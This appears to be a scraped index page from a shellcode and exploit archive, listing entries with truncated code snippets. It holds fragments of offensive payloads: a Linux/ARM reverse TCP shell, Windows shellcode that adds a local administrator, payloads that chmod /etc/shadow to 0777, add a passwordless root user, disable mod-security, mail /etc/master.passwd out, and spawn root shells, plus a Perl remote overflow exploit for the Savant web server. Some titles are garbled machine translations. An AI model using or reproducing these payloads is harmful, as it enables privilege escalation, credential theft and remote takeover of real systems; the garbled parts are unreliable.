CVE-2020-37029 FTPDummy 4.80 - Local Buffer Overflow

FTPDummy 4.80 contains a local buffer overflow vulnerability in its preference file handling that allows attackers to execute arbitrary code. Attackers can craft a malicious preference file with carefully constructed shellcode to trigger a structured exception handler overwrite and execute system...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes)

/ Title: Linux/ARM - Reverse Shell TCP /bin/sh. Null free shellcode 80 bytes Date: 2018-01-25 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .text .global start start: / Enter Thumb mode / .ARM add r3, pc, 1 bx r3 .THUMB / Create a new socket/ mov r0, 2 // PFINET = 2 mo...

Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)

Windows x86 - CreateProcessA cmd.exe Shellcode 253 bytes. Shellcode exploit for Winx86 platform...

winxp, the win2003, win7, win8 General the shellcode-exploit warning-the black bar safety net

This code in vc6 to compile, extract the shellcode when the debug mode, open the memory window, copy the binary code into the shellcode can be Code changes to the original address: http://hi.baidu.com/egodcore/item/c13e67fe197c940fc6dc45f5 int main asm nop; nop; nop; nop; nop; nop; nop; push ebp;...

Allwin WinExec add new local administrator + ExitProcess Shellcode

No description provided by source. / Title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes Date: 2011-05-25 Author: RubberDuck Web: http://bflow.security-portal.cz Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG 32, Win Vista 32/64, Win 7 32/64, Win 2k8 32 ...

linux/x86 chmod("/etc/shadow", 0777) shellcode 29 bytes

Exploit for linux/x86 platform in category shellcode ======================================================= linux/x86 chmod"/etc/shadow", 0777 shellcode 29 bytes ======================================================= include include / by Magnefikko 20.04.2010 email protected promhyl.oz.pl...

Linux x86 - disabled modsecurity - 64 bytes

No description provided by source. view source print? / [email protected] - Goodfellas Security Research Team - 2010 /usr/sbin/a2dismod mod-security2 - disable modsecurity 64 bytes asm "xor %eax,%eax \n" "push %eax \n" "cdq \n" "push $0x646f6d73 \n" "push $0x69643261 \n" "push $0x2f6e6962...

Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)

Vulnerability : .m3u File Local Stack Overflow Exploit SEH Full Rewrite + Product : Millenium MP3 Studio + Versions affected : v1.0 + Download : http://www.software112.com/products/mp3-millennium+download.html + Method : seh + Tested on : Windows XP SP3 En + Written by : corelanc0d3r...

BSD/x86 - setuid/execve - 30 bytes

No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. Tested on OpenBSD and FreeBSD. / ...

Alpha - setuid() Shellcode (156 bytes)

Alpha - setuid Shellcode 156 bytes. Shellcode exploit for Alpha platform char shellcode= "\x30\x15\xd9\x43" / subq $30,200,$16 / "\x11\x74\xf0\x47" / bis $31,0x83,$17 / "\x12\x14\x02\x42" / addq $16,16,$18 / "\xfc\xff\x32\xb2" / stl $17,-4$18 / "\x12\x94\x09\x42" / addq $16,76,$18 /...

Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes)

Linux/x86 - setuid + execve + exit Shellcode 44 bytes. Shellcode exploit for Linuxx86 platform / Linux x86 shellcode by bob / / setuid; execve; exit; / include char shellcode= "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"...

Hair two I have extracted the shellcode-exploit warning-the black bar safety net

Article author: pt007atvip.sina.com I. S. T. O. ALL RIGHTS RESERVED 1, A//win2003+sp2 was added under a test11/Test11!!! Admin user shellcode: unsigned char shellcode= "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x24"...

bsd/x86 cat /etc/master.passwd | mail [email] 92 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; pueden reemplzar el comando por lo que se les ocurra. / char shellcode=...

Savant 3.1 Get Request Remote Overflow Exploit (Universal)

No description provided by source. !/usr/bin/perl -w exploit for Savant webserver 3.1 remote bof shellcode bind 4444 port on target host Jacopo cervini aka [email protected] use IO::Socket; if!$ARGV1 print "Uso: savant-3.1.pl victim port\n\n"; exit; $victim = IO::Socket::INET-newProto='tcp',...

linux/x86 setuid(0) + execve(/bin/sh) 28 bytes

No description provided by source. / revenge-setuid.c, v1.0 2006/09/30 14:57 linux/x86 setuid0 + execve"/bin//sh", "/bin//sh", NULL shellcode once again... setuid 6 bytes + execve 22 bytes = 28 bytes Same as revenge-execve.c we start the 2 system calls with a mov resulting in 2 bytes less, but th...

linux/x86 execve(/bin/sh) 22 bytes

No description provided by source. / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode http://www.0xcafebabe.it [email protected] But this time it's 22 bytes We could start the shellcode with a mov instead of pus...

XGalaga 2.0.34 local game exploit (Red Hat 9.0)

No description provided by source. / 0x333xgalaga = XGalaga 2.0.34 local game exploit Red Hat 9.0 tested against xgalaga-2.0.34-1.i386.rpm under Red Hat Linux 9.0 - bug found by Steve Kemp - exploit coded by c0wboy @ 0x333 c 0x333 Outsider Security Labs / www.0x333.org / include stdio.h include...

linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes

Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes =================================================== / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char...

linux/x86 Adduser without Password to /etc/passwd 59 bytes

Exploit for linux/x86 platform in category shellcode ========================================================== linux/x86 Adduser without Password to /etc/passwd 59 bytes ========================================================== / linux/x86 adds user 'xtz' without password to /etc/passwd - 59...

linux/x86 24/7 open cd-rom loop (follows /dev/cdrom symlink) 39 bytes

Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes ===================================================================== / linux/x86 24/7 open cd-rom loop...